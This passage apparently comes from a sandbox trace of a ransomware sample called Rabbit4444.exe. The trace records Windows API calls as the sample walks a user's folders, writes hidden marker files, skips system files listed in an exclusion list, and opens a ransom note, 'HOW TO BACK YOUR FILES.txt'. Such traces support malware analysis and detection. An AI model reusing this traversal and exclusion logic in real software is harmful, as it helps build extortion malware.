"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.608] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.611] FlushFileBuffers (hFile=0x228) returned 1 [0068.611] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.612] CloseHandle (hObject=0x228) returned 1 [0068.612] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore") returned 118 [0068.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.612] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2380189, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0068.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.612] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.612] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.612] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.612] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2380189, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.612] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.612] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.612] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.613] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.613] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.613] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2380189, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2380189, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf2380189, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.613] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.613] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.613] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6XK9396H", cAlternateFileName="")) returned 1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="Rabbit4444.exe") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2=".") returned 1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="..") returned 1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="windows") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="bootmgr") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="pagefile.sys") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="boot") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="ids.txt") returned -1 [0068.613] lstrcmpiW (lpString1="6XK9396H", lpString2="NTUSER.DAT") returned -1 [0068.613] lstrcpyW (in: lpString1=0x130ec26, lpString2="6XK9396H" | out: lpString1="6XK9396H") returned="6XK9396H" [0068.613] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H", dwFileAttributes=0x2012) returned 1 [0068.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0068.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x100) returned 0x11e1e8 [0068.613] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x121fe8 [0068.613] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="91PWXIKE", cAlternateFileName="")) returned 1 [0068.613] lstrcmpiW (lpString1="91PWXIKE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="Rabbit4444.exe") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2=".") returned 1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="..") returned 1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="windows") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="bootmgr") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="pagefile.sys") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="boot") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="ids.txt") returned -1 [0068.614] lstrcmpiW (lpString1="91PWXIKE", lpString2="NTUSER.DAT") returned -1 [0068.614] lstrcpyW (in: lpString1=0x130ec26, lpString2="91PWXIKE" | out: lpString1="91PWXIKE") returned="91PWXIKE" [0068.614] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE", dwFileAttributes=0x2012) returned 1 [0068.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0068.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x100) returned 0x11e2f0 [0068.614] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x1222c8 [0068.614] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc87147, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc87147, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BDSHWV0N", cAlternateFileName="")) returned 1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="Rabbit4444.exe") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2=".") returned 1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="..") returned 1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="windows") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="bootmgr") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="pagefile.sys") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="boot") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="ids.txt") returned -1 [0068.614] lstrcmpiW (lpString1="BDSHWV0N", lpString2="NTUSER.DAT") returned -1 [0068.615] lstrcpyW (in: lpString1=0x130ec26, lpString2="BDSHWV0N" | out: lpString1="BDSHWV0N") returned="BDSHWV0N" [0068.615] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N", dwFileAttributes=0x2012) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0068.615] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x100) returned 0x11da10 [0068.615] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122268 [0068.615] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0068.615] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0068.615] lstrcpyW (in: lpString1=0x130ec26, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0068.615] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\container.dat", dwFileAttributes=0x2022) returned 1 [0068.615] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\container.dat", dwFileAttributes=0x2006) returned 1 [0068.616] lstrlenW (lpString="container.dat") returned 13 [0068.616] lstrlenW (lpString="Rabbit4444") returned 10 [0068.616] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0068.616] lstrlenW (lpString=".dll") returned 4 [0068.616] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0068.616] lstrlenW (lpString=".lnk") returned 4 [0068.616] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0068.616] lstrlenW (lpString=".ini") returned 4 [0068.616] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0068.616] lstrlenW (lpString=".sys") returned 4 [0068.616] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0068.616] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VD3M5B2U", cAlternateFileName="")) returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="Rabbit4444.exe") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2=".") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="..") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="windows") returned -1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="bootmgr") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="pagefile.sys") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="boot") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="ids.txt") returned 1 [0068.616] lstrcmpiW (lpString1="VD3M5B2U", lpString2="NTUSER.DAT") returned 1 [0068.616] lstrcpyW (in: lpString1=0x130ec26, lpString2="VD3M5B2U" | out: lpString1="VD3M5B2U") returned="VD3M5B2U" [0068.616] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U", dwFileAttributes=0x2012) returned 1 [0068.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0068.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x100) returned 0x11db18 [0068.617] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x122008 [0068.617] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VD3M5B2U", cAlternateFileName="")) returned 0 [0068.617] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0068.617] lstrcpyW (in: lpString1=0x130ec26, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.618] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.618] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.618] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.618] CloseHandle (hObject=0x280) returned 1 [0068.618] CloseHandle (hObject=0x228) returned 1 [0068.618] GetCurrentThreadId () returned 0xd98 [0068.618] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0068.618] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U" [0068.618] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db18 | out: hHeap=0xe0000) returned 1 [0068.618] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0068.618] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U" [0068.619] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\" [0068.619] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\.BFC0E91B00AE8A0620D3" [0068.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\vd3m5b2u\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.620] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.622] FlushFileBuffers (hFile=0x228) returned 1 [0068.623] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.623] CloseHandle (hObject=0x228) returned 1 [0068.624] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U") returned 127 [0068.624] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.624] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2380189, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0068.624] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.624] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.624] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.624] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.624] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2380189, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.624] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.624] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.624] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.624] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.624] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.624] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2380189, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2380189, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf23a64a9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.624] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.624] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.624] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2380189, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2380189, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf23a64a9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0068.625] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0068.625] lstrcpyW (in: lpString1=0x130ec38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\VD3M5B2U\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\vd3m5b2u\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.625] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.625] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.626] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.626] CloseHandle (hObject=0x280) returned 1 [0068.626] CloseHandle (hObject=0x228) returned 1 [0068.626] GetCurrentThreadId () returned 0xd98 [0068.626] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0068.626] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N", iMaxLength=2048 | out: 